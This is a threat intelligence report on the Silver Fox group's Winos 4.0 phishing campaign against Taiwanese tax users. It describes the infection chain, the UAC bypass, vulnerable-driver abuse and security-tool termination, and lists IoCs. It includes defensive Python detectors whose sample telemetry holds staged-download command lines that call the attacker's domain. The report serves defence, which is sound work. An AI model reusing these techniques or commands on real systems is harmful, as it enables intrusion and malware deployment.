【CyCraft Monthly Intelligence】Taiwan Tax Filing Alert: Silver Fox Targets Users with Winos 4.0 Spear Phishing

Threat and Impact

Security teams have observed a series of spear phishing attacks targeting Taiwan. The primary threat is the delivery of Winos 4.0 (ValleyRat), a modular Windows Remote Access Trojan (RAT). The campaign is attributed with high confidence to the APT group Silver Fox (also known as Void Arachne). The activity is assessed as "High Severity" because it combines sophisticated social engineering, rapidly rotating delivery infrastructure, and aggressive evasion techniques designed to maintain long-term remote control over victims.

Analyst Perspective

This campaign heavily leverages tax and invoice-related themes, making it particularly dangerous for organizations that frequently handle external accounting, legal compliance, and government documentation. Finance and accounting departments are the main targets, as attackers often disguise malware as "official documents" to infiltrate these high-value segments.

Incident Description

The campaign uses localized, practical business scenarios as bait, mimicking standard Taiwanese workflows, including:

  • Tax audit notifications
  • Tax filing software installation
  • Cloud invoice downloads
  • Government/official website impersonation via look-alike domains and misleading links

Victims are lured into opening malicious archives (ZIP) or clicking embedded links. These payloads are hosted across rotating domains and cloud storage services. This high volatility allows attackers to bypass static defense mechanisms, such as one-time domain blocklists.

Primary Threat: Enterprise Infiltration via Winos 4.0

Once executed, Winos 4.0 provides attackers with a flexible platform for remote management and post-exploitation. Its modular plugin architecture allows attackers to load specific modules on demand, including:

  • File management
  • Screenshots/remote screen interaction
  • Remote control
  • System administration

A key shift in this campaign is the move toward stealthier and low-footprint execution. This includes storing modules within the Windows registry and utilizing in-memory loading to minimize disk-based access, significantly increasing the difficulty of forensic detection.

The primary impact observed on compromised Windows systems is widespread file encryption, leading to immediate operational disruption. This prevents access to critical data and halts business processes. Furthermore, exfiltrated data may be weaponized for subsequent follow-on attacks.

Scope of Impact

While current observations focus on Taiwan, this APT group remains active across Asia with a broad historical target list, including:

  • Healthcare
  • Government/public sector
  • Critical infrastructure
  • Cybersecurity companies
  • E-commerce and finance
  • Sales- and management-oriented enterprises

Technical Details

The core of this event involves a multi-stage phishing campaign targeting Taiwan. It begins with the delivery of Winos 4.0 (ValleyRat), followed by UAC bypass and privilege escalation. The attackers utilize a BYOVD (Bring Your Own Vulnerable Driver) technique to load a vulnerable signed driver (wsftprm.sys) to evade defenses at the kernel level. Finally, a modular RAT is deployed, with core components and plugins downloaded from the C2 server, stored in the Windows registry, and executed via in-memory loading.

In other related cases, the delivery methods for Winos 4.0 have evolved from LNK-based download chains to DLL side-loading. The infrastructure leverages rotating domains and cloud storage services while maintaining a stable C2 (47.76.86.151) for post-exploitation control.

Reconnaissance

Winos 4.0 queries the Windows registry value VulnerableDriverBlocklistEnable at:

  • SYSTEM\CurrentControlSet\Control\CI\Config
  • Fallback path: SYSTEM\ControlSet001\Control\CI\Config

This allows the malware to determine if Microsoft’s Vulnerable Driver Blocklist is enabled and adjust its driver-loading strategy accordingly.

Security Tool Identification via Process Enumeration:

After gaining kernel-level capabilities, the malware compares running processes against a hardcoded list of security products to identify and terminate active defenses.

Resource Development

Rotating Delivery Infrastructure:

Attackers register multiple domains and utilize Chinese cloud storage services to host malicious payloads and archives:

  • bqdrzbyq[.]cn (hosting Setup64.exe)
  • njhwuyklw[.]com (redirecting to cloud-hosted archives)
  • TOS buckets such as *.tos-cn-shanghai.volces[.]com (hosting E-Invoice.rar)

Initial Access

Localized Spear Phishing:

Phishing emails mimic Taiwanese tax and e-invoice workflows (e.g., tax audit notifications, filing software installers, or cloud invoice downloads).

Payload Delivery through Attachments or Links:

  • Campaign 1: RAR archives (e.g., taxIs_RX3001.rar) containing phishing documents and malicious LNK files.
  • Campaign 2: Phishing links impersonating official websites, directing users to attacker-controlled cloud storage to download archives containing a legitimate EXE and a malicious DLL for side-loading.

Execution

Campaign 1: LNK → cmd.exe → Staged Download → Installer Extraction

LNK Execution Chain: The shortcut reaches the command processor through a relative path: ..\..\..\..\Windows\System32\cmd.exe.

Obfuscated Script: The obfuscated command script handles the staged download and installation:

  • Create a working directory: %public%\501
  • Copy the legitimate curl.exe into it and rename it url.exe
  • Download the next-stage executable, Setup64.exe, from bqdrzbyq[.]cn using the renamed binary
  • Execute DeviceCredentialDeployment.exe so that the phased deployment appears "normal"

Installer / Dropper Behavior: When Setup64.exe (disguised as "64-bit Installer_Special Edition") is executed, it searches for an embedded executable resource named EXPAND. It then decompresses and writes this resource to C:\ProgramData\Golden. This establishes a local foundation for the subsequent deployment of ValleyRat and the implementation of defense evasion via drivers.

Campaign 2: Legitimate EXE and Malicious DLL Side-Loading

The attacker's transition from LNK intermediate chains to DLL side-loading involves the following steps:

  • The victim executes a legitimate application contained within the compressed archive.
  • The legitimate application loads a malicious DLL provided by the attacker, which subsequently executes the next-stage code or shellcode.

A distinct developer artifact, a PDB path, is observed within the malicious DLL: C:\Users\Administrator\Desktop\大馬專案(二)\x64\Release\DLL.pdb

This indicates a clear division of labor within their organization. This artifact serves as a critical lead for tracking and analyzing other related malicious activities.

Persistence

Registry-Resident Modules (Fileless): After C2 communication is established, core and plugin modules are downloaded and stored directly in the Windows registry, then loaded into memory to minimize the disk footprint.

Privilege Escalation

Bypass UAC to Gain Higher Privileges:

  • Winos 4.0 executes RunUAC() and verifies current privileges via CheckAdminPrivileges.
  • If privileges are not elevated, it employs BypassUACViaDebugObject, combining RPC AppInfo service calls with Debug Object Hijacking.
  • It leverages the whitelisted Windows binary computerdefaults.exe for privilege escalation. This method bypasses UAC prompts, minimizing user visibility and reducing telemetry noise.

Kernel-Level Escalation through BYOVD: The malware loads wsftprm.sys (a signed 64-bit kernel driver, "Topaz OFD - PM", v2.0.0.0) to gain kernel-mode execution capabilities.

Defense Evasion

This campaign utilizes multi-layered defense evasion techniques across all stages of the operation.

  • Command obfuscation: Obfuscate cmd.exe chains triggered by LNK files to evade detection.
  • Masquerading as trusted tools: Copy and rename the legitimate curl.exe to url.exe within %public%\501. This tactic helps bypass simple allow/block logic based solely on filenames and increases the difficulty of initial forensic investigations.
  • Execution via trusted binaries (proxy execution):
    • DLL Side-loading: Leverage legitimate executables as loaders for malicious payloads.
    • Invoke DeviceCredentialDeployment.exe as a "cover" to blend in with normal system behaviors.
  • Evasive BYOVD driver loading:
    • Dynamically resolve native APIs from ntdll.dll (e.g., RtlInitUnicodeString, RtlAdjustPrivilege, NtLoadDriver) to load drivers in a specific manner, attempting to circumvent standard service monitoring.
    • Inspect VulnerableDriverBlocklistEnable and adjust behavior based on system security settings.
  • Massive suppression of security tools:
    • After gaining kernel privileges, Winos 4.0 continuously monitors and terminates security product processes in real-time.
    • The hardcoded target list includes multiple Microsoft Defender components (e.g., MsMpEng.exe, NisSrv.exe, smartscreen.exe, SecurityHealth*) and various third-party suites (Trend Micro, Symantec, 360, Huorong, Avast, AVG, etc.).
    • This is a critical step to ensure the stable operation of the RAT and minimize the risk of removal.
  • Configuration obfuscation:
    • The malware stores configuration elements, including C2 addresses and security process lists, using Base64 encoding (with the latter utilizing double Base64 encoding).
  • Minimize disk footprint:
    • Modules and plugins are stored in the Windows registry and loaded directly into memory, reducing file-based detection and leaving fewer forensic artifacts on the disk.

Credential Access

Interception of Login Credentials via Plugins:
This campaign downloads a “Login Module” plugin that supports keylogging capabilities, enabling the interception of user-entered usernames and passwords.

Discovery

  • OS/Version verification: Before connecting to the C2 server, Winos 4.0 validates the environment by checking the OS version.
  • Security configuration probe: Query the VulnerableDriverBlocklistEnable registry value to understand the system's defensive configurations.
  • Security product process discovery: Enumerate running processes and compare them against a built-in termination list to determine which security tools are currently active.

Collection

Screen Capture via Plugin Modules: Winos 4.0 downloads screen-oriented plugin modules, such as:

  • High refresh rate screen
  • Entertainment/multimedia screen
  • Non-standard screen

These modules support screen capture or remote desktop-like data collection, allowing attackers to monitor user activities and exfiltrate sensitive information displayed on the screen.

Command and Control (C2)

Phased Payload Retrieval via Attacker Infrastructure

  • Action 1: Use the masqueraded downloader (%public%\501\url.exe, the renamed curl.exe) to download Setup64.exe from bqdrzbyq[.]cn.
  • Action 2: Download compressed archives from cloud storage services via the phishing redirect infrastructure.

Hardcoded C2 with Runtime Decoding

  • Winos 4.0 conceals its C2 IP address 47.76.86.151 using double Base64 encoding (TkRjdU56WXVPRFl1TVRVeA==), which is decoded only at runtime.
  • Upon passing environment checks, it connects to the C2 to download the core "Online Module" DLL.
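The runtime decoding described above is easy to reverse during triage. The following decoder is an added example (not CyCraft's tooling or the malware's code): it peels Base64 layers until the result stops being valid Base64, then labels the plaintext. The first sample is the double-encoded C2 string quoted in this report; the other samples are constructed here, and the layer cap and classification rules are assumptions.

```python
"""Peel layered Base64 from a malware configuration string and label the result.

Added example, not CyCraft's tooling or the malware's own code. The first
sample is the double-encoded C2 value quoted in this report; the other
samples are constructed here to exercise the same decoder.
"""
import base64
import binascii
import ipaddress
import re

MAX_LAYERS = 5  # assumption: stop after this many layers to avoid endless peeling
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _decode_once(value):
    """Decode one Base64 layer; return None when the input is not clean,
    printable-ASCII Base64, which is how we know the plaintext was reached."""
    value = value.strip()
    if not value or len(value) % 4 or not _B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def peel_base64(value, max_layers=MAX_LAYERS):
    """Strip nested Base64 layers. Returns (layers_removed, innermost_text)."""
    current = value
    for layer in range(max_layers):
        decoded = _decode_once(current)
        if decoded is None:
            return layer, current
        current = decoded
    return max_layers, current


def classify(text):
    """Rough label for a decoded config string: ipv4, process-list, hostname or other."""
    try:
        ipaddress.IPv4Address(text)
        return "ipv4"
    except ValueError:
        pass
    parts = [p for p in re.split(r"[,;|\r\n]+", text) if p]
    if parts and all(p.lower().endswith(".exe") for p in parts):
        return "process-list"
    if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", text, re.I):
        return "hostname"
    return "other"


def analyze(value):
    """Decode a config blob and report layers removed, plaintext and its kind."""
    layers, text = peel_base64(value)
    return {"layers": layers, "plaintext": text, "kind": classify(text)}


def _double_b64(text):
    """Build a constructed double-encoded sample in the style the report describes."""
    once = base64.b64encode(text.encode()).decode()
    return base64.b64encode(once.encode()).decode()


SAMPLES = {
    # Double-encoded C2 string quoted in the report (decodes to 47.76.86.151).
    "c2": "TkRjdU56WXVPRFl1TVRVeA==",
    # Constructed: a double-encoded kill list using process names the report lists.
    "process_list": _double_b64("MsMpEng.exe|NisSrv.exe|smartscreen.exe"),
    # Constructed: a single-layer hostname, to show that the layer count differs.
    "hostname": base64.b64encode(b"bqdrzbyq.cn").decode(),
    # Constructed: text that was never encoded; the decoder must leave it alone.
    "plain": "not-base64-at-all",
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        print(f"{label:13} -> {analyze(blob)}")
```

Because the loop stops at the first layer that is not valid printable Base64, the same function handles single-, double- and triple-encoded strings without knowing the depth in advance; the layer count itself is a useful triage signal, since legitimate configuration rarely nests Base64.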

Modular Post-Compromise Control

  • After acquiring the Online Module, the malware proceeds to download additional plugins (e.g., File Management, Screen Modules, System Management) and the Login Module.
  • These modules are stored in the registry and loaded directly into memory. This allows the attacker to maintain persistent, "remote management" operations while minimizing file-level forensic footprints.
  • Service-Level Probing Beyond HTTP/S: Reconnaissance activities include attempted SSH (Port 22) connections to government systems, such as the Australian Department of Finance, Ministry of Finance of Afghanistan, and the Office of the Prime Minister of Nepal. This indicates a high level of interest in direct remote management interfaces rather than just web-based applications.

Mitigation

The success of the Winos 4.0 campaign stems from its use of localized phishing (tax audits, filing software, and invoice themes) integrated with multi-stage loaders, DLL side-loading, and BYOVD techniques utilizing the signed driver wsftprm.sys for kernel-level defense evasion.

Consequently, mitigation strategies must be multi-layered. Organizations should operate under the assumption that "mere static domain blocking is insufficient," as attackers frequently rotate domains and exploit cloud storage services.

1. Block Initial Access: Email, Web, and User Execution Controls

Strengthen Phishing Detection

  • Enable real-time anti-phishing, reputation scoring, and dynamic analysis (sandboxing) for both attachments and embedded links. This campaign utilizes look-alike domains (e.g., taxfnat[.]tw) and redirects to cloud-hosted payloads (e.g., tos-cn-shanghai.volces[.]com).
  • Treat keywords such as "Official Tax" or "Invoice" as high-risk; apply stricter inspection and sandboxing policies to emails containing these government-related terms.

Neutralize Malicious Archives and LNK Downloaders

  • Block or quarantine attachment types common to this attack chain, such as archives containing .LNK files or "installer" EXEs delivered via compressed files.
  • Enforce "Sandbox First" or "Dynamic Analysis" for suspicious archives, particularly those with unusual combinations like shortcut files or "decoy document + LNK" pairings.

Security Awareness and Phishing Simulations

  • Institutionalize employee education to verify unexpected "government/financial" messages through alternative channels (e.g., official websites or phone), reducing over-reliance on the perceived legitimacy of "localized business processes."

2. Stop Payload Delivery and Pre-Exploitation on Endpoints

Detect/Block Suspicious Command Chains and LOLBins

Hunt or block patterns identified in this campaign, such as:

  • Creation of staging directories (e.g., %Public%\501).
  • Copying and renaming curl.exe to url.exe, followed by download activity.
  • Dropping files into unusual paths such as C:\ProgramData\Golden.

Intercepting these early-stage high-risk signals can prevent the full establishment of the RAT or its plugin stack.
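One way to hunt for that chain in process-creation telemetry, as an added example that is not CyCraft's or any vendor's rule set: each indicator from the list above becomes a weighted pattern, hits are summed per host, and a host crossing the threshold is returned for isolation. The events are constructed Sysmon-style Event ID 1 records; the host names, the `PLACEHOLDER_dropped.exe` file name, the weights and the threshold are assumptions to tune per environment.

```python
r"""Score process-creation telemetry for the staged download chain described above
(relative-path cmd.exe from an LNK, %Public%\501 staging, curl.exe renamed to
url.exe, the DeviceCredentialDeployment.exe cover, and drops into C:\ProgramData\Golden).

Added example, not CyCraft's or any vendor's rule set. Events are constructed
Sysmon-style Event ID 1 records; weights and threshold are assumptions."""
import re
from collections import defaultdict

# (rule name, pattern matched against "Image CommandLine", weight)
RULES = [
    ("lnk_relative_cmd", re.compile(r"(\.\.\\){2,}Windows\\System32\\cmd\.exe", re.I), 2),
    ("staging_dir_public_501", re.compile(r"%public%\\501|\\Users\\Public\\501", re.I), 2),
    ("curl_renamed_to_url", re.compile(r"\bcopy\b.*\bcurl\.exe\b.*\\url\.exe\b", re.I), 3),
    ("renamed_curl_download", re.compile(r"\\url\.exe\b.*(https?:|\s-o\b|--output\b)", re.I), 3),
    ("cover_binary", re.compile(r"\\DeviceCredentialDeployment\.exe\b", re.I), 1),
    ("golden_drop_dir", re.compile(r"\\ProgramData\\Golden\\", re.I), 2),
]
ALERT_THRESHOLD = 5  # assumption: one weak signal alone (e.g. the cover binary) must not page anyone


def match_rules(event):
    """Return the names of rules whose pattern appears in the event's image or command line."""
    text = f'{event.get("Image", "")} {event.get("CommandLine", "")}'
    return [name for name, rx, _ in RULES if rx.search(text)]


def score_hosts(events):
    """Aggregate distinct rule hits per host; each rule counts once per host."""
    weights = {name: w for name, _, w in RULES}
    per_host = defaultdict(lambda: {"score": 0, "hits": set(), "images": []})
    for ev in events:
        hits = match_rules(ev)
        if not hits:
            continue
        host = per_host[ev["Computer"]]
        for name in hits:
            if name not in host["hits"]:
                host["hits"].add(name)
                host["score"] += weights[name]
        host["images"].append(ev["Image"])
    return dict(per_host)


def hosts_to_isolate(events, threshold=ALERT_THRESHOLD):
    """Hosts whose combined chain score reaches the threshold."""
    return sorted(h for h, v in score_hosts(events).items() if v["score"] >= threshold)


# Constructed sample telemetry: one infected finance workstation, one noisy-but-benign dev box.
SAMPLE_EVENTS = [
    {"Computer": "WS-FIN-07", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": (r"..\..\..\..\Windows\System32\cmd.exe /c mkdir %public%\501 & "
                     r"copy C:\Windows\System32\curl.exe %public%\501\url.exe & "
                     r"%public%\501\url.exe -o %public%\501\Setup64.exe hxxp://bqdrzbyq[.]cn/Setup64.exe")},
    {"Computer": "WS-FIN-07", "Image": r"C:\Users\Public\501\url.exe",
     "CommandLine": r"C:\Users\Public\501\url.exe -o C:\Users\Public\501\Setup64.exe hxxp://bqdrzbyq[.]cn/Setup64.exe"},
    {"Computer": "WS-FIN-07", "Image": r"C:\Windows\System32\DeviceCredentialDeployment.exe",
     "CommandLine": "DeviceCredentialDeployment.exe"},
    # The report names the drop directory but not the dropped file; the file name is a placeholder.
    {"Computer": "WS-FIN-07", "Image": r"C:\ProgramData\Golden\PLACEHOLDER_dropped.exe",
     "CommandLine": r"C:\ProgramData\Golden\PLACEHOLDER_dropped.exe"},
    {"Computer": "WS-DEV-02", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Temp\tool.zip https://example.com/tool.zip"},
    {"Computer": "WS-DEV-02", "Image": r"C:\Windows\System32\DeviceCredentialDeployment.exe",
     "CommandLine": "DeviceCredentialDeployment.exe"},
]

if __name__ == "__main__":
    for host, result in score_hosts(SAMPLE_EVENTS).items():
        print(host, result["score"], sorted(result["hits"]))
    print("isolate:", hosts_to_isolate(SAMPLE_EVENTS))
```

The benign developer host shows why the signals are weighted and summed rather than alerted on individually: an ordinary curl.exe download matches nothing, and DeviceCredentialDeployment.exe alone scores 1, while the finance host accumulates every stage of the chain.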

Application Allowlisting

The second wave of the campaign utilizes DLL side-loading (legitimate EXEs loading malicious DLLs from the same directory). Mitigation includes:

  • Enforce allowlists that permit only approved applications to run, restricting execution from user-writable or temporary directories.
  • Monitor and alert for "signed/legitimate binaries loading DLLs from abnormal directories."
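The second bullet above can be turned into a concrete check over image-load telemetry. The following is an added example, not CyCraft's or any EDR vendor's detection logic: it flags a DLL loaded from the executable's own directory when that directory is user-writable, when a signed EXE loads an unsigned DLL, or when the DLL carries a well-known Windows library name but was not loaded from System32. The records are constructed Sysmon-style image-load events; the field names, the `PLACEHOLDER_*` file names and the two-signal threshold are assumptions, and `AISafeSDK64.dll` is the malicious DLL name from this report's hash list.

```python
r"""Flag image-load events that look like DLL side-loading.

Added example, not CyCraft's or any EDR vendor's logic. Records are constructed
Sysmon-style image-load events; field names and thresholds are assumptions."""
import ntpath

USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# A few well-known Windows DLL names that side-loaders commonly impersonate.
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "userenv.dll"}
MIN_REASONS = 2  # assumption: require two independent signals before alerting


def _dir(path):
    """Lower-cased directory of a Windows path, with trailing backslash."""
    return ntpath.dirname(path).lower() + "\\"


def sideload_reasons(ev):
    """Return the side-loading indicators present in one image-load event."""
    exe, dll = ev["image"], ev["loaded"]
    if not dll.lower().endswith(".dll") or _dir(exe) != _dir(dll):
        return []  # only DLLs loaded from beside the EXE are candidates
    reasons = []
    if ev.get("image_signed") and not ev.get("loaded_signed"):
        reasons.append("signed EXE loaded unsigned DLL from its own directory")
    if _dir(exe).startswith(USER_WRITABLE_ROOTS):
        reasons.append("EXE and DLL reside in a user-writable directory")
    if ntpath.basename(dll).lower() in SYSTEM_DLL_NAMES and _dir(dll) not in SYSTEM_DLL_DIRS:
        reasons.append("system DLL name loaded from outside System32")
    return reasons


def find_sideloads(events, min_reasons=MIN_REASONS):
    """Events with at least min_reasons indicators, ready for alerting."""
    hits = []
    for ev in events:
        reasons = sideload_reasons(ev)
        if len(reasons) >= min_reasons:
            hits.append({"host": ev["host"], "image": ev["image"],
                         "loaded": ev["loaded"], "reasons": reasons})
    return hits


# Constructed sample telemetry (the legitimate EXE name in the archive is not given in the report).
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "image": r"C:\Users\alice\Downloads\E-Invoice\PLACEHOLDER_viewer.exe",
     "image_signed": True, "loaded": r"C:\Users\alice\Downloads\E-Invoice\AISafeSDK64.dll",
     "loaded_signed": False},
    {"host": "WS-DEV-02", "image": r"C:\Program Files\PLACEHOLDER_vendor\app.exe",
     "image_signed": True, "loaded": r"C:\Program Files\PLACEHOLDER_vendor\helper.dll",
     "loaded_signed": True},
    {"host": "WS-DEV-02", "image": r"C:\Windows\System32\notepad.exe",
     "image_signed": True, "loaded": r"C:\Windows\System32\version.dll", "loaded_signed": True},
    {"host": "WS-OPS-03", "image": r"C:\Users\bob\AppData\Local\Temp\PLACEHOLDER_tool.exe",
     "image_signed": False, "loaded": r"C:\Users\bob\AppData\Local\Temp\version.dll",
     "loaded_signed": False},
    {"host": "WS-FIN-07", "image": r"C:\Users\alice\Downloads\E-Invoice\PLACEHOLDER_viewer.exe",
     "image_signed": True, "loaded": r"C:\Windows\System32\kernel32.dll", "loaded_signed": True},
]

if __name__ == "__main__":
    for hit in find_sideloads(SAMPLE_EVENTS):
        print(hit["host"], hit["loaded"], hit["reasons"])
```

The same-directory test is what keeps this rule quiet on normal software: the last sample shows the suspicious viewer loading kernel32.dll from System32, which is ordinary and produces no indicator.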

3. Prevent Privilege Escalation and Driver Abuse (BYOVD)

Enable and Enforce Microsoft's Vulnerable Driver Blocklist

The malware explicitly checks the following registry values:

  • SYSTEM\CurrentControlSet\Control\CI\Config\VulnerableDriverBlocklistEnable
  • SYSTEM\ControlSet001\Control\CI\Config\VulnerableDriverBlocklistEnable

Ensure these controls are enabled and monitored. This is a primary mitigation, as the attack's evasion relies heavily on loading wsftprm.sys.

Monitor and Alert Suspicious Driver Loading

Winos 4.0 uses native APIs (e.g., NtLoadDriver) to bypass standard service monitoring. Ensure EDR/SIEM tools collect driver load events and correlate them with:

  • Prior UAC bypass attempts.
  • Subsequent mass termination of security processes.
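The correlation recommended above, written out as an added example (not CyCraft's or any EDR vendor's code): for every suspicious driver load on a host, look back for an auto-elevating binary launched from an unexpected parent and look forward for terminations of security processes, then grade the combination. The events are constructed; the field names (`host`, `ts`, `type`, `image`, `parent`, `driver`, `signed`), the time windows, the expected parents of computerdefaults.exe, the `PLACEHOLDER_*` names and the driver's on-disk path are assumptions, while wsftprm.sys, computerdefaults.exe and the Defender process names come from this report.

```python
"""Correlate kernel driver loads with a preceding UAC bypass attempt and a
following burst of security-process terminations.

Added example, not CyCraft's or any EDR vendor's code. Events are constructed
and the field names are assumptions, not a real product schema."""
from datetime import datetime, timedelta

SECURITY_PROCESS_PREFIXES = ("msmpeng.exe", "nissrv.exe", "smartscreen.exe", "securityhealth")
SUSPECT_DRIVERS = ("wsftprm.sys",)                     # named in the report
AUTO_ELEVATE_BINARIES = ("computerdefaults.exe",)      # named in the report
EXPECTED_PARENTS = ("explorer.exe", "svchost.exe")     # assumption: usual launchers
LOOKBACK = timedelta(minutes=30)                       # assumption
LOOKAHEAD = timedelta(minutes=30)                      # assumption


def _name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _ts(ev):
    return datetime.fromisoformat(ev["ts"])


def is_security_process(image):
    return _name(image).startswith(SECURITY_PROCESS_PREFIXES)


def is_suspect_driver(ev):
    """Known-bad name from the report, or any driver without a verified signature."""
    return _name(ev["driver"]) in SUSPECT_DRIVERS or not ev.get("signed", True)


def is_uac_bypass_attempt(ev):
    """Auto-elevating binary launched by something other than its usual parents."""
    return (_name(ev["image"]) in AUTO_ELEVATE_BINARIES
            and _name(ev.get("parent", "")) not in EXPECTED_PARENTS)


def correlate(events, lookback=LOOKBACK, lookahead=LOOKAHEAD):
    """One alert per suspicious driver load, graded by the surrounding evidence."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs = sorted(evs, key=_ts)
        for ev in evs:
            if ev["type"] != "driver_load" or not is_suspect_driver(ev):
                continue
            t = _ts(ev)
            bypass = [e for e in evs if e["type"] == "process_create"
                      and t - lookback <= _ts(e) < t and is_uac_bypass_attempt(e)]
            killed = sorted({_name(e["image"]) for e in evs if e["type"] == "process_terminate"
                             and t < _ts(e) <= t + lookahead and is_security_process(e["image"])})
            if bypass and len(killed) >= 2:
                severity = "critical"
            elif bypass or len(killed) >= 2:
                severity = "high"
            else:
                severity = "medium"
            alerts.append({"host": host, "driver": _name(ev["driver"]), "time": ev["ts"],
                           "uac_bypass": bool(bypass), "killed": killed, "severity": severity})
    return alerts


# Constructed sample timeline; the driver's directory is a constructed path, not one the report gives.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "ts": "2026-02-03T10:00:00", "type": "process_create",
     "image": r"C:\Windows\System32\computerdefaults.exe",
     "parent": r"C:\ProgramData\Golden\PLACEHOLDER_dropped.exe"},
    {"host": "WS-FIN-07", "ts": "2026-02-03T10:05:00", "type": "driver_load",
     "driver": r"C:\ProgramData\Golden\wsftprm.sys", "signed": True},
    {"host": "WS-FIN-07", "ts": "2026-02-03T10:06:00", "type": "process_terminate",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\PLACEHOLDER_version\MsMpEng.exe"},
    {"host": "WS-FIN-07", "ts": "2026-02-03T10:06:30", "type": "process_terminate",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\PLACEHOLDER_version\NisSrv.exe"},
    {"host": "WS-FIN-07", "ts": "2026-02-03T10:07:00", "type": "process_terminate",
     "image": r"C:\Windows\System32\smartscreen.exe"},
    {"host": "WS-DEV-02", "ts": "2026-02-03T11:00:00", "type": "driver_load",
     "driver": r"C:\Users\dev\PLACEHOLDER_test.sys", "signed": False},
    {"host": "WS-OPS-01", "ts": "2026-02-03T12:00:00", "type": "process_create",
     "image": r"C:\Windows\System32\computerdefaults.exe", "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS-OPS-01", "ts": "2026-02-03T12:01:00", "type": "driver_load",
     "driver": r"C:\Windows\System32\drivers\PLACEHOLDER_vendor.sys", "signed": True},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Note that the finance host's driver is validly signed, exactly as wsftprm.sys is; the name match and the surrounding UAC bypass and kill burst are what make it critical, whereas the developer's unsigned test driver with no other evidence stays at medium and the ops host, where computerdefaults.exe was launched from Explorer, produces nothing.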

Minimize Local Admin Privileges and Harden UAC

The malware bypasses UAC via whitelisted binaries like computerdefaults.exe. Reducing the prevalence of local administrator accounts and monitoring for abnormal elevation through these binaries decreases the likelihood of attackers loading kernel drivers or disabling defenses.

4. Restrict C2 and Post-Exploitation via Network Controls

Block and Hunt Known Infrastructure

For immediate defense and retroactive hunting, block:

  • C2 IPs: 47[.]76[.]86[.]151 (and the related 154[.]91[.]64[.]246).
  • Delivery Domains/Redirectors: bqdrzbyq[.]cn, taxfnat[.]tw, njhwuyklw[.]com, and suspicious downloads from tos-cn-shanghai.volces[.]com buckets.

Recommended Incident Response (IR) Actions

  • If early indicators (LNK→cmd, %Public%\501, wsftprm.sys loading, or C2 beacons) are observed, isolate the host immediately.
  • Assume credentials have been compromised due to high-integrity execution. Perform a password reset for all accounts used on the affected host and review their privileged access status.

Reference

IoCs (Indicators of Compromise)

Domains

bqdrzbyq[.]cn

taxfnat[.]tw

njhwuyklw[.]com

twtaxgo[.]cn

taxhub[.]tw

taukeny[.]com

taxpro[.]tw

lmaxjuyh[.]cn

tkooyvff[.]cn

etaxtw[.]cn

twswsb[.]cn

IP

47[.]76[.]86[.]151

URLs

hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar

hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar

hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z

Hashes

Setup.exe
  MD5:     bf332f14062f184d3886a0bd2d4cd1a4
  SHA-1:   b6aadb2337dac0a8089bf56cfc4eb7838b9bb14d
  SHA-256: 64ee7a2e6259286311c8ba1c7b6d30e1e52fe78befcfd1b71b291c788f3e3e6a

AISafeSDK64.dll
  MD5:     64300c171c8b452466546e25acd3d5d1
  SHA-1:   8ef2efdbd724aaf9d482a7da3ecf39e4c8a53e5d
  SHA-256: 156f31b37ee0d6e7f87cdc94dcd2d3b084b2e15da08bd8588e17d6bdc43159fe

About CyCraft

CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.
